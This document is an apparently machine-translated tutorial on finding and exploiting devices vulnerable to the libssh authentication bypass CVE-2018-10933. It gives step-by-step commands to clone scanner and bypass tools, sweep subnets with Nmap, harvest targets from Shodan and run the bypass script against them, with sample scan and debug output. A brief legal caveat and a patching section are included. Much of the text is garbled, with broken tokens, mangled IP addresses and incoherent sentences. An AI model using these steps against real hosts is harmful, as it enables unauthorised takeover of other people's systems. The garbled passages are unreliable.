Computers around the world rely on a program called "libssh" to use the SSH communication protocol, which allows trusted users to log in and remotely manage computers. Due to a bug in libssh, it is easy to give a computer permission to grant SSH access. The vulnerability could cause an attacker to gain complete control of a device.
What is SSH and why do we have a big problem?
Computers support many of our society's most important systems, and it needs to be updated regularly. For network administrators and other IT professionals, configuring and updating their managed systems is a common task. To accomplish this, a protocol called SSH or the secure shell is often used to remotely access another network device so that a user can make changes to any system they can log on to.
Libssh is mainly used for remote interaction With servers, trusted users can easily obtain a command-line interface that has complete control over the device. The power that SSH brings to a device means security is critical. That's why SSH has been so hard to attack in the past. This makes this exploit even more notable and more serious, potentially threatening many systems.
For an SSH connection to be established, an SSH server must exist on the device You want to remotely access them. This server is waiting for connection requests and grants access to authorized users. Libssh is a library written in C that allows the server to listen to SSH on many devices used by large companies like GitHub to interact with their infrastructure.
Despite its popularity, libssh is kept in the free time of a small team of MacHub developers and is not used as often as other SSH libraries, such as the more popular OpenSSH. While this is good news for most users using OpenSSH, there were still thousands of devices that had vulnerable versions of libssh connected directly to the Internet at the time of discovery.
Even months after the first coverage of CVE-2018-10933, there are still many devices that have not yet been updated, even though libssh has released patches about libssh version 0.8.4 and libssh version 0.7.6 ,
In a normal SSH session, the user tries to log in with a username and password. Depending on whether the credentials are valid, the server accepts or rejects the connection. In the following example, we try to log in to a server with libssh using the wrong password by typing ssh username @ ipaddress into a terminal window.
ssh email@example.com The authenticity of the host & # 39; 18.104.22.168 (22.214.171.124) & # 39; can not be determined. The RSA key fingerprint is SHA256: Vkx9gDp1E / df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ. Do you want to continue the connection (Yes / No)? Yes Warning: & # 39; 126.96.36.199 & # 39; (RSA) has been permanently added to the list of known hosts. Password from firstname.lastname@example.org: Access denied, please try again. Password from email@example.com: Access denied, please try again. Password from firstname.lastname@example.org: email@example.com: Authorization denied (publickey, keyboard-interactive, password).
Because the password is unknown, the connection attempt is denied and we are kept away from the server. In addition, if we try to log in too often and fail, we are sometimes prohibited from connecting to this server.
In versions of libssh with the error in question, a user can make the system think they are already being authenticated by sending an unexpected message indicating that the connection has already been made successfully, and the need to enter a Bypass passwords. This allows an attacker to gain complete control of the affected system without knowledge of the password, and constitutes a critical vulnerability in any system with affected versions of libssh.
Imagine you could gain access to a stranger's house simply by telling them that you live there. In this trick, we skip the process of proving that we belong with a password and send out a success message instead.
This error occurs when an attacker does not attempt to log in the normal way, but sends the server a message that appears to confirm that the attacker has already authenticated , This "Authentication Successful" message confuses the server in granting access without a password, completely bypassing the normal security of the system.
Step 1: Install Tools and Dependencies
The first program we use to scan for vulnerable devices is Nmap, which can be easily installed . On Kali, this should be by default, but if not, you can download it quickly with the following command:
apt install nmap
To find out if a device that we discover is vulnerable, we use the Python program libssh scanner. It's written in Python 2.7, so if you only have Python 3 installed, you'll need to install Python 2.7 as well.
To install libssh-scanner, you must clone the libssh-scanner repository by typing the following:
git clone https://github.com/leapsecurity/libssh-scanner.git[19659012Ifyouhavedavailableinthedirectoryyoumustinstalltherequiredlibrariesbypiping pip command to see below.
cd libssh scanner ls pip install -r Requirements.txt
Next you need to install the program to run the attack. This time, clone the libSSH Authentication Bypass repository and install all dependencies using the following commands:
git clone https://github.com/purplesec/libSSH-Authentication-Bypass.git cd libSSH Authentication Bypass pip install -r Requirements.txt
Step 2: Using Nmap to Search Services Running Libssh
The first step in fixing or exploiting a vulnerable device is to find it, and it is relative simply finding devices on your local network may require attention. To do this, we use a program called Nmap to find devices running an SSH server and determine if libssh is running on them. Nmap is an indispensable tool in any hacker toolkit that allows you to quickly search and discover all hosts and services in a given network or IP range.
In this case, the devices connected to our network locally and Nmap are checked Tell us if each device on the network uses a vulnerable version of libssh. To follow this guide, you must install Nmap. However, if you are using Kali Linux, Nmap is probably already installed.
To scan and discover all devices on the local network using libssh, open a terminal window and enter the following nmap command.
nmap -sV -p22 192.168.0.0/24[19659012$BreakingdowntheCommand: nmap tells the computer that we really want to use Nmap -sV tells Nmap that we want to perform a service scan that captures the banner of a service being used on an open port. The flag -p22 instructs Nmap to scan only devices on port 22, the default port for SSH communications. While devices that use SSH on a different port may not be found, search times are dramatically reduced.
Finally, the destination is expressed as a subnet area. The first three bytes of this are unique to your search. When scanning a series of computers, not just one, the 0/24 is ultimately essential for searching the entire subnet. If you need to find your subnet range, you can use a tool like "ipcalc" that will calculate it for you. To do so, find your IP address by typing ifconfig and then type ipcalc yourIP (replace "yourIP" with your IP address.)
The command returns a list of devices connected to the subnet and some information collected from the scanned port. In this case, we are looking for targets that use a libssh version prior to 0.7.6. You can expect an output as follows:
Nmap scan report for 172.16.42.1 Host is active (0.0098s latency). PORT STATE SERVICE VERSION 22 / tcp ssh closed Nmap scan report for 172.16.42.32 Host is active (0.21s latency). PORT STATE SERVICE VERSION 22 / tcp open ssh libssh 0.7.2 (protocol 2.0) Nmap scan report for 172.16.42.53 Host is active (0.079s latency). PORT STATE SERVICE VERSION 22 / tcp ssh closed Nmap scan report for 172.16.42.67 Host is active (0.024s latency). PORT STATE SERVICE VERSION 22 / tcp-filtered ssh
Step 3: Detect remote devices that execute vulnerable libssh versions
The vast majority of vulnerable servers can be accessed through a remote network. Therefore, we must look elsewhere to find disconnected devices directly to our LAN.
To find a remote destination, you need to use a service called Shodan, a search engine that can find any device connected to the web - unlike Google, which only returns results from the web server Port 80. Instead of referring you to a website trying to sell your security cameras, Shodan can redirect you to the login page of working IP cameras. This may give you access to the camera if the default password remains unchanged.
Shodan will have indexed many susceptible SSH servers so we can search for port numbers as well as other keywords that indicate hosts running versions of libssh that are known to run before 0.7.6 Vulnerability Affected
First, sign up for a free account that will allow you to view the first two pages of a search query or about 20 different devices. To find servers that are vulnerable to the libssh exploit, you need three search terms:
- port: 22 the default port for the SSH protocol. Although SSH can be moved to any unused port, this is not all that common as the server is not found by a simple scan to port 22.
- LibSSH returning any server advertises with the libssh library, indicating that they may be exploitable.
- 0.7. * Limiting search results to devices using libssh versions starting with "0.7". and excludes more recent versions of the results. Although you may still get results that have been patched, this filter will fix most of the updated devices.
The above search returns a list of IP addresses that may be vulnerable to this attack, as well as some other information that Shodan was able to retrieve. Shodan information includes a banner pull, the location of the device, the last activity, and the organization that controls the server.
Step 4: Attempting to exploit on a potentially vulnerable system
If you have collected a list of locally or remotely vulnerable targets for the exploit, You can use libssh-scanner to scan target IP addresses and determine if they are still vulnerable. Other tools can go even further when creating a shell. However, it is important to note that accessing another device with SSH could violate the Computer Fraud and Abuse Act without permission. Depending on who owns the device you are accessing, it can cause serious legal issues.
In addition to legal considerations, you should be wary of attaching devices from your real IP address that might intentionally be vulnerable to this exploit. Honeypots are often set up to attract hobby hackers, and you might be in a device configured as a trap.
Use libssh-scanner to verify that the targets collected in steps 2 and 3 are actually used to be vulnerable to the exploit. To do this, create a TXT file containing all the IP addresses found in steps 2 and 3, with each IP address separated by new lines. Name this text file "ips.txt" and put it in the same folder where the libssh scanner was previously downloaded in step 1.
In the directory, enter the following command in a terminal window.
python libsshscan .py --port 22 --gressive ips.txt
The command runs Python 2.7, scans each IP address in the text file, and determines if the target is actually vulnerable to the CVE 2018 vulnerability. 10933 is. As you can see below, Shodan's list of potential targets has been limited to 159,180,132,163.
python libsshscan.py - aggressive --port 22 ips.txt libssh scanner 1.0.4 Search for vulnerable hosts ... * 188.8.131.52:22 is not vulnerable to authentication bypass (b # SSH-2.0-libssh-0.7.2 & # 39;) * 184.108.40.206:22 is not vulnerable to authentication override (b # SSH-2.0-libssh-0.7.0 & # 39;) * 220.127.116.11:22 is not vulnerable to authentication bypass (b # SSH-2.0-libssh-0.7.0 & # 39; * 18.104.22.168:22 is not vulnerable to authentication bypass (b # SSH-2.0-libssh-0.7.0 & # 39; * 22.214.171.124:22 is not vulnerable to authentication override (b # SSH-2.0-libssh-0.7.0 & # 39; * 126.96.36.199:22 is not vulnerable to authentication bypass (b # SSH-2.0-libssh-0.7.0) * 188.8.131.52:22 is not vulnerable to authentication override (b # SSH-2.0-libssh-0.7.0 & # 39;) * 184.108.40.206:22 is not vulnerable to authentication bypass (b # SSH-2.0-libssh-0.7.0 & # 39; ! 220.127.116.11:22 is probably VULNERABLE for authentication bypass (b # SSH-2.0-libssh-0.7.2 & # 39;) * 18.104.22.168:22 is not vulnerable to authentication override (b # SSH-2.0-libssh-0.7.0 & # 39; Scanner completed successfully
To check for a result, use libSSH Authentication Bypass to test the attack. In the folder where you downloaded libSSH Authentication Bypass, go to the directory you downloaded earlier in step 1 and enter the following command. Instead of "22.214.171.124", replace the IP address you want to scan.
python3 libsshauthbypass.py --host 159.180 .132.163
The command returns the following output on a server that has been partially patched but is still vulnerable to the authentication override.
python3 bypasswithfakekey.py --host 126.96.36.199 DEBUG: paramiko.transport: startup thread (client mode): 0x74a0d30 DEBUG: paramiko.transport: Local Version / Idstring: SSH-2.0-paramiko_2.0.8 DEBUG: paramiko.transport: Remote Version / ID String: SSH-2.0-libssh-0.7.2 INFO: paramiko.transport: Connected (Version 2.0, client libssh-0.7.2) DEBUG: paramiko.transport: kex algos: ['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] Server Key: ['ssh-rsa'] Encrypt Client: ['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] Encrypt Server: ['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] Client Mac: ['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] Server Mac: ['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] Client Compression: ['none', 'zlib', 'firstname.lastname@example.org'] Server Compression: ['none', 'zlib', 'email@example.com'] client lang: [''] server lang: [''] kex? false DEBUG: paramiko.transport: Kex agreed: diffie-hellman-group1-sha1 DEBUG: paramiko.transport: Cipher agreed: aes128-ctr DEBUG: paramiko.transport: MAC agreed: hmac-sha2-256 DEBUG: paramiko.transport: Compression agreed: none /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier were no longer supported. Please use the sign and confirm instead. Algorithm = Hashes.SHA1 () DEBUG: paramiko.transport: Kex Engine KexGroup1 Specified Hash_Algo
DEBUG: paramiko.transport: Switch to new keys ... /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/client.py:689: UserWarning: Unknown ssh-rsa host key for 188.8.131.52: b & # 39; 7a7f8ca5b97cdd9356114ac6503456 key.get_fingerprint ()))) DEBUG: paramiko.transport: userauth is fine INFO: paramiko.transport: Authentication (password) failed. However, bypassing the server that you are trying to work around does not produce the shell that creates patches, truncates, or uses the wrong vulnerable libSSH version. -blacknbunny
If you receive a message that the connection is successful, you have confirmed the vulnerability on the device being tested. If the connection fails or you see a partially successful result as above, you have confirmed that the problem does not affect the target (although it may need to be updated anyway in a partial success).
Step 5: Automating the Attack and Other Considerations
When you scan a large network that has many devices attached to it, all the results of an Nmap scan can be dropped into the terminal window, making manual data analysis cumbersome and time-consuming makes.
Using some handy Linux tools, you can limit the results displayed to results that are relevant to the attack you are attempting to perform. To do this, enter the following command in a terminal window, replacing "192.168.0.0/24" with your IP address range.
nmap -sV -p22 192.168.0.0/24 | grep -B 4 "LibSSH" | cat >> results.txt.
The first part of this command is known because it is the same as the one used to run the Nmap scan in step 2. Then follow the symbol | is called a pipe that "routes" (or sends) the results of the Nmap scan to a search grep that finds lines that contain text that matches "LibSSH".
Because the IP for the results prints four lines above where the SSH information is declared, you must add -B 4 to make sure that all required information is included.
After retrieving the information you need, the data is displayed. Using the command cat passed to a text file, a TXT file is created that contains all the matching results.
Protection against attacks
If you manage a server that uses libssh to manage SSH communication, it is important to make sure that you are using libssh version 0.7.6 or later, as this is the case bssh developers have Problem solved.
To reduce the likelihood of being found on Shodan, avoid forwarding ports to the open Internet. In general, it is better to use a VPN to access your local area network to prevent your ports from being connected to the Internet at all.
If you are worried that your devices will appear on Shodan, you can verify that Port forwarding to your IP address is via Router Security, which displays information about your public IP address can.
I hope you liked this guide to detecting and attacking devices with the libssh vulnerability! If you have questions about this libssh tutorial, please contact them or contact Twitter @KodyKinzie .